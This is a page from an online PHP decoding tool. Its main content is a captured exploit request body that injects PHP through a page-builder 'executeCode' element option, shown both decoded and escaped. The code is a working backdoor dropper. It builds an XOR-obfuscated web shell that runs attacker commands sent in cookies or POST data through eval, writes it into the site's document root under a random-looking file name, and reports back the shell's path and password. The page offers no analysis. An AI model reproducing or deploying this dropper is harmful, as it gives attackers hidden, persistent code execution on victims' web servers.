Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

{\x22nonce\x22: \x228b28c42866\x22, \x22loopElement\x22: {\x22id\x22: \x22-1\x22, \x22sett..

Decoded Output download

{"nonce": "8b28c42866", "loopElement": {"id": "-1", "settings": {"query": {"useQueryEditor": "1", "queryEditor": "s"}}}, "postId": "-1", "t": "t", "element": {"settings": {"executeCode": "s", "code": "<?php 


if(!defined(\"PHP_EOL\"))
{
    define(\"PHP_EOL\", \"\n\");
}

if(!defined(\"DIRECTORY_SEPARATOR\"))
{
    define(\"DIRECTORY_SEPARATOR\", \"/\");
}
function generateRandomStringEval($length = 12)
{
    $characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString ;
}
function generateRndString($length = 10)
{
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString ;
}
function generateRandomString($length = 10)
{
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString . \".php\";
}

function _add_action($snippet, $template, $xor_number)
{

    $splitted = str_split($snippet);
    $action = \"\";
    for ($i = 0; $i < strlen($snippet);$i++) {
        $action .= $splitted[$i] ^ $template[$i%$xor_number];
    }
    $action = urlencode($action);
    return $action;
}

function GetDocRoot()
{
    $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);
    if ($docroot_end === FALSE)
    {
        return $_SERVER['DOCUMENT_ROOT'];
    }
    elseif ($docroot_end === 0)
    {
        return \"/\";
    }
    else
    {
        return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
    }
}

$origin_backdoor =  base64_decode(\"PD9waHANCkBpbmlfc2V0KCdlcnJvcl9sb2cnLCBOVUxMKTsNCkBpbmlfc2V0KCdsb2dfZXJyb3JzJywgMCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQoNCg0KZnVuY3Rpb24gc2hkcCgkZGF0YSwgJGtleSkNCnsNCiAgICAkb3V0X2RhdGEgPSAiIjsNCiAgICBmb3IgKCRpID0gMDsgJGkgPCBzdHJsZW4oJGRhdGEpOykgew0KICAgICAgICBmb3IgKCRqID0gMDsgJGogPCBzdHJsZW4oJGtleSkgJiYgJGkgPCBzdHJsZW4oJGRhdGEpOyAkaisrLCAkaSsrKSB7DQogICAgICAgICAgICAkb3V0X2RhdGEgLj0gY2hyKG9yZCgkZGF0YVskaV0pIF4gb3JkKCRrZXlbJGpdKSk7DQogICAgICAgIH0NCiAgICB9DQogICAgcmV0dXJuICRvdXRfZGF0YTsNCn0NCmlmIChpc3NldCgkX0dFVFs2NzM0MzVdKSkNCnsNCiAgICBkaWUobWQ1KDQ3NzEyKSk7DQp9DQokdGVtcD1hcnJheV9tZXJnZSgkX0NPT0tJRSwgJF9QT1NUKTsNCmZvcmVhY2ggKCR0ZW1wIGFzICRkYXRhX2tleSA9PiAkZGF0YSkgew0KICAgICRkYXRhID0gQHVuc2VyaWFsaXplKHNoZHAoc2hkcChiYXNlNjRfZGVjb2RlKCRkYXRhKSwgJzRlZjYzYWJlLTFhYmQtNDVhNi05MTNkLTZmYjk5NjU3ZTI0YicpLCAkZGF0YV9rZXkpKTsNCiAgICBpZiAoaXNzZXQoJGRhdGFbJ2FrJ10pKSB7DQogICAgICAgIGlmICgkZGF0YVsnYSddID09ICdpJykgew0KICAgICAgICAgICAgJGkgPSBhcnJheSgNCiAgICAgICAgICAgICAgICAncHYnID0+IEBwaHB2ZXJzaW9uKCksDQogICAgICAgICAgICAgICAgJ3N2JyA9PiAnMS4wLTEnLA0KICAgICAgICAgICAgKTsNCiAgICAgICAgICAgIGVjaG8gQHNlcmlhbGl6ZSgkaSk7DQogICAgICAgIH0gZWxzZWlmICgkZGF0YVsnYSddID09ICdlJykgew0KICAgICAgICAgICAgZXZhbCgkZGF0YVsnZCddKTsNCiAgICAgICAgfQ0KICAgICAgICBleGl0KCk7DQogICAgfQ0KfQ==\");
$new_pass = generateRndString(35);
$origin_backdoor = str_replace(\"4ef63abe-1abd-45a6-913d-6fb99657e24b\",$new_pass,$origin_backdoor );


$evaluaor = base64_decode(\"PD9waHANCg0KZnVuY3Rpb24gX3JlbW92ZV9hY3Rpb24oJHNuaXBwZXQsICR0ZW1wbGF0ZSkNCnsNCiAgICAkc25pcHBldCA9IHVybGRlY29kZSgkc25pcHBldCk7DQogICAgJHNwbGl0dGVkID0gc3RyX3NwbGl0KCRzbmlwcGV0KTsNCiAgICAkYWN0aW9uID0gIiI7DQogICAgZm9yICgkaSA9IDA7ICRpIDwgc3RybGVuKCRzbmlwcGV0KTskaSsrKSB7DQogICAgICAgICRhY3Rpb24gLj0gJHNwbGl0dGVkWyRpXSBeICR0ZW1wbGF0ZVskaSV4b3JfbnVtYmVyXTsNCiAgICB9DQogICAgcmV0dXJuICRhY3Rpb247DQp9DQoNCiRpPSIjVVJMRU5DT0RFRF9DT0RFIyI7DQokaj0iI1VSTEVOQ09ERURfZmlsZV9wdXRfY29udGV0bnRzIyI7DQoNCiRpbmRleD0iI1hPUktFWSMiOw0KDQokayA9IF9yZW1vdmVfYWN0aW9uKCRpLCAkaW5kZXgpOw0KJGYgPSBfcmVtb3ZlX2FjdGlvbigkaiwgJGluZGV4KTsNCiRmKCRpbmRleCwgJGspOw0KaW5jbHVkZV9vbmNlICgkaW5kZXgpOw0KdW5saW5rKCRpbmRleCk7DQpleGl0KCk7\");


$xor_number=rand(3,12);
$XORKEY = generateRandomStringEval(12);
$URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number);
$URLENCODED_CODE_file_put_contents = _add_action(\"file_put_contents\", $XORKEY, $xor_number);
$snippet_varname = generateRandomStringEval(rand(6,12));
$template_varname = generateRandomStringEval(rand(6,12));
$splitted_varname = generateRandomStringEval(rand(6,12));
$_remove_action_varname = generateRandomStringEval(rand(6,12));
$index_varname = generateRandomStringEval(rand(6,12));
$evaluaor=str_replace('$splitted', \"$\".$splitted_varname, $evaluaor);
$evaluaor=str_replace('xor_number', $xor_number, $evaluaor);
$evaluaor=str_replace('$index', \"$\".$index_varname, $evaluaor);
$evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor);
$evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor);
$evaluaor=str_replace('$template', \"$\".$template_varname, $evaluaor);
$evaluaor=str_replace('$snippet', \"$\".$snippet_varname, $evaluaor);
$evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor);
$payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor);
srand(time());


if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) {
            return false;
        } else {
            $bytes = fwrite($f, $data);
            fclose($f);
            return $bytes;
        }
    }
}

////////////////////////////////////////////////////////////////////////////////////////////
$filename = \"readurl.php\";
# $filename = generateRandomString();

#$filename = \"options-reading.php\";
#$filename = \"wp-login.php\";
$filename = \"xjc6q59v.php\";
# get base local and remote path
$base_www_path = $host = @$_SERVER['HTTP_HOST'];
$base_local_path = GetDocRoot();

$full_payload_name = GetDocRoot() . \"/$filename\";
$good = FALSE;
if (file_put_contents($full_payload_name, $payload_file))
{
    echo \"UROK#http://\" . $filename. \"#ONDOK#\". $new_pass . \"#ENDP\" . PHP_EOL;
    $good=TRUE;
    $good_counter++;
    exit();
}
if(!$good)
    echo \"URL#STATUS_CANTUPLOAD#CCCURL\";
echo \"#CCCURL\";
//unlink(\"dfaonfpfkwg.php\");
exit();?>"}, "name": "code", "class": "Element_Code"}}"

Did this file decode correctly?

Original Code

{\x22nonce\x22: \x228b28c42866\x22, \x22loopElement\x22: {\x22id\x22: \x22-1\x22, \x22settings\x22: {\x22query\x22: {\x22useQueryEditor\x22: \x221\x22, \x22queryEditor\x22: \x22s\x22}}}, \x22postId\x22: \x22-1\x22, \x22t\x22: \x22t\x22, \x22element\x22: {\x22settings\x22: {\x22executeCode\x22: \x22s\x22, \x22code\x22: \x22<?php \x5Cn\x5Cn\x5Cnif(!defined(\x5C\x22PHP_EOL\x5C\x22))\x5Cn{\x5Cn    define(\x5C\x22PHP_EOL\x5C\x22, \x5C\x22\x5C\x5Cn\x5C\x22);\x5Cn}\x5Cn\x5Cnif(!defined(\x5C\x22DIRECTORY_SEPARATOR\x5C\x22))\x5Cn{\x5Cn    define(\x5C\x22DIRECTORY_SEPARATOR\x5C\x22, \x5C\x22/\x5C\x22);\x5Cn}\x5Cnfunction generateRandomStringEval($length = 12)\x5Cn{\x5Cn    $characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz';\x5Cn    $charactersLength = strlen($characters);\x5Cn    $randomString = '';\x5Cn    for ($i = 0; $i < $length; $i++) {\x5Cn        $randomString .= $characters[rand(0, $charactersLength - 1)];\x5Cn    }\x5Cn    return $randomString ;\x5Cn}\x5Cnfunction generateRndString($length = 10)\x5Cn{\x5Cn    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';\x5Cn    $charactersLength = strlen($characters);\x5Cn    $randomString = '';\x5Cn    for ($i = 0; $i < $length; $i++) {\x5Cn        $randomString .= $characters[rand(0, $charactersLength - 1)];\x5Cn    }\x5Cn    return $randomString ;\x5Cn}\x5Cnfunction generateRandomString($length = 10)\x5Cn{\x5Cn    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';\x5Cn    $charactersLength = strlen($characters);\x5Cn    $randomString = '';\x5Cn    for ($i = 0; $i < $length; $i++) {\x5Cn        $randomString .= $characters[rand(0, $charactersLength - 1)];\x5Cn    }\x5Cn    return $randomString . \x5C\x22.php\x5C\x22;\x5Cn}\x5Cn\x5Cnfunction _add_action($snippet, $template, $xor_number)\x5Cn{\x5Cn\x5Cn    $splitted = str_split($snippet);\x5Cn    $action = \x5C\x22\x5C\x22;\x5Cn    for ($i = 0; $i < strlen($snippet);$i++) {\x5Cn        $action .= $splitted[$i] ^ $template[$i%$xor_number];\x5Cn    }\x5Cn    $action = urlencode($action);\x5Cn    return $action;\x5Cn}\x5Cn\x5Cnfunction GetDocRoot()\x5Cn{\x5Cn    $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);\x5Cn    if ($docroot_end === FALSE)\x5Cn    {\x5Cn        return $_SERVER['DOCUMENT_ROOT'];\x5Cn    }\x5Cn    elseif ($docroot_end === 0)\x5Cn    {\x5Cn        return \x5C\x22/\x5C\x22;\x5Cn    }\x5Cn    else\x5Cn    {\x5Cn        return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);\x5Cn    }\x5Cn}\x5Cn\x5Cn$origin_backdoor =  base64_decode(\x5C\x22PD9waHANCkBpbmlfc2V0KCdlcnJvcl9sb2cnLCBOVUxMKTsNCkBpbmlfc2V0KCdsb2dfZXJyb3JzJywgMCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQoNCg0KZnVuY3Rpb24gc2hkcCgkZGF0YSwgJGtleSkNCnsNCiAgICAkb3V0X2RhdGEgPSAiIjsNCiAgICBmb3IgKCRpID0gMDsgJGkgPCBzdHJsZW4oJGRhdGEpOykgew0KICAgICAgICBmb3IgKCRqID0gMDsgJGogPCBzdHJsZW4oJGtleSkgJiYgJGkgPCBzdHJsZW4oJGRhdGEpOyAkaisrLCAkaSsrKSB7DQogICAgICAgICAgICAkb3V0X2RhdGEgLj0gY2hyKG9yZCgkZGF0YVskaV0pIF4gb3JkKCRrZXlbJGpdKSk7DQogICAgICAgIH0NCiAgICB9DQogICAgcmV0dXJuICRvdXRfZGF0YTsNCn0NCmlmIChpc3NldCgkX0dFVFs2NzM0MzVdKSkNCnsNCiAgICBkaWUobWQ1KDQ3NzEyKSk7DQp9DQokdGVtcD1hcnJheV9tZXJnZSgkX0NPT0tJRSwgJF9QT1NUKTsNCmZvcmVhY2ggKCR0ZW1wIGFzICRkYXRhX2tleSA9PiAkZGF0YSkgew0KICAgICRkYXRhID0gQHVuc2VyaWFsaXplKHNoZHAoc2hkcChiYXNlNjRfZGVjb2RlKCRkYXRhKSwgJzRlZjYzYWJlLTFhYmQtNDVhNi05MTNkLTZmYjk5NjU3ZTI0YicpLCAkZGF0YV9rZXkpKTsNCiAgICBpZiAoaXNzZXQoJGRhdGFbJ2FrJ10pKSB7DQogICAgICAgIGlmICgkZGF0YVsnYSddID09ICdpJykgew0KICAgICAgICAgICAgJGkgPSBhcnJheSgNCiAgICAgICAgICAgICAgICAncHYnID0+IEBwaHB2ZXJzaW9uKCksDQogICAgICAgICAgICAgICAgJ3N2JyA9PiAnMS4wLTEnLA0KICAgICAgICAgICAgKTsNCiAgICAgICAgICAgIGVjaG8gQHNlcmlhbGl6ZSgkaSk7DQogICAgICAgIH0gZWxzZWlmICgkZGF0YVsnYSddID09ICdlJykgew0KICAgICAgICAgICAgZXZhbCgkZGF0YVsnZCddKTsNCiAgICAgICAgfQ0KICAgICAgICBleGl0KCk7DQogICAgfQ0KfQ==\x5C\x22);\x5Cn$new_pass = generateRndString(35);\x5Cn$origin_backdoor = str_replace(\x5C\x224ef63abe-1abd-45a6-913d-6fb99657e24b\x5C\x22,$new_pass,$origin_backdoor );\x5Cn\x5Cn\x5Cn$evaluaor = base64_decode(\x5C\x22PD9waHANCg0KZnVuY3Rpb24gX3JlbW92ZV9hY3Rpb24oJHNuaXBwZXQsICR0ZW1wbGF0ZSkNCnsNCiAgICAkc25pcHBldCA9IHVybGRlY29kZSgkc25pcHBldCk7DQogICAgJHNwbGl0dGVkID0gc3RyX3NwbGl0KCRzbmlwcGV0KTsNCiAgICAkYWN0aW9uID0gIiI7DQogICAgZm9yICgkaSA9IDA7ICRpIDwgc3RybGVuKCRzbmlwcGV0KTskaSsrKSB7DQogICAgICAgICRhY3Rpb24gLj0gJHNwbGl0dGVkWyRpXSBeICR0ZW1wbGF0ZVskaSV4b3JfbnVtYmVyXTsNCiAgICB9DQogICAgcmV0dXJuICRhY3Rpb247DQp9DQoNCiRpPSIjVVJMRU5DT0RFRF9DT0RFIyI7DQokaj0iI1VSTEVOQ09ERURfZmlsZV9wdXRfY29udGV0bnRzIyI7DQoNCiRpbmRleD0iI1hPUktFWSMiOw0KDQokayA9IF9yZW1vdmVfYWN0aW9uKCRpLCAkaW5kZXgpOw0KJGYgPSBfcmVtb3ZlX2FjdGlvbigkaiwgJGluZGV4KTsNCiRmKCRpbmRleCwgJGspOw0KaW5jbHVkZV9vbmNlICgkaW5kZXgpOw0KdW5saW5rKCRpbmRleCk7DQpleGl0KCk7\x5C\x22);\x5Cn\x5Cn\x5Cn$xor_number=rand(3,12);\x5Cn$XORKEY = generateRandomStringEval(12);\x5Cn$URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number);\x5Cn$URLENCODED_CODE_file_put_contents = _add_action(\x5C\x22file_put_contents\x5C\x22, $XORKEY, $xor_number);\x5Cn$snippet_varname = generateRandomStringEval(rand(6,12));\x5Cn$template_varname = generateRandomStringEval(rand(6,12));\x5Cn$splitted_varname = generateRandomStringEval(rand(6,12));\x5Cn$_remove_action_varname = generateRandomStringEval(rand(6,12));\x5Cn$index_varname = generateRandomStringEval(rand(6,12));\x5Cn$evaluaor=str_replace('$splitted', \x5C\x22$\x5C\x22.$splitted_varname, $evaluaor);\x5Cn$evaluaor=str_replace('xor_number', $xor_number, $evaluaor);\x5Cn$evaluaor=str_replace('$index', \x5C\x22$\x5C\x22.$index_varname, $evaluaor);\x5Cn$evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor);\x5Cn$evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor);\x5Cn$evaluaor=str_replace('$template', \x5C\x22$\x5C\x22.$template_varname, $evaluaor);\x5Cn$evaluaor=str_replace('$snippet', \x5C\x22$\x5C\x22.$snippet_varname, $evaluaor);\x5Cn$evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor);\x5Cn$payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor);\x5Cnsrand(time());\x5Cn\x5Cn\x5Cnif (!function_exists('file_put_contents')) {\x5Cn    function file_put_contents($filename, $data) {\x5Cn        $f = @fopen($filename, 'w');\x5Cn        if (!$f) {\x5Cn            return false;\x5Cn        } else {\x5Cn            $bytes = fwrite($f, $data);\x5Cn            fclose($f);\x5Cn            return $bytes;\x5Cn        }\x5Cn    }\x5Cn}\x5Cn\x5Cn////////////////////////////////////////////////////////////////////////////////////////////\x5Cn$filename = \x5C\x22readurl.php\x5C\x22;\x5Cn# $filename = generateRandomString();\x5Cn\x5Cn#$filename = \x5C\x22options-reading.php\x5C\x22;\x5Cn#$filename = \x5C\x22wp-login.php\x5C\x22;\x5Cn$filename = \x5C\x22xjc6q59v.php\x5C\x22;\x5Cn# get base local and remote path\x5Cn$base_www_path = $host = @$_SERVER['HTTP_HOST'];\x5Cn$base_local_path = GetDocRoot();\x5Cn\x5Cn$full_payload_name = GetDocRoot() . \x5C\x22/$filename\x5C\x22;\x5Cn$good = FALSE;\x5Cnif (file_put_contents($full_payload_name, $payload_file))\x5Cn{\x5Cn    echo \x5C\x22UROK#http://\x5C\x22 . $filename. \x5C\x22#ONDOK#\x5C\x22. $new_pass . \x5C\x22#ENDP\x5C\x22 . PHP_EOL;\x5Cn    $good=TRUE;\x5Cn    $good_counter++;\x5Cn    exit();\x5Cn}\x5Cnif(!$good)\x5Cn    echo \x5C\x22URL#STATUS_CANTUPLOAD#CCCURL\x5C\x22;\x5Cnecho \x5C\x22#CCCURL\x5C\x22;\x5Cn//unlink(\x5C\x22dfaonfpfkwg.php\x5C\x22);\x5Cnexit();?>\x22}, \x22name\x22: \x22code\x22, \x22class\x22: \x22Element_Code\x22}}"

Function Calls

None

Variables

None

Stats

MD5	0c3a1dd9ddcc2a1728d438651eb2775d
Eval Count	0
Decode Time	64 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats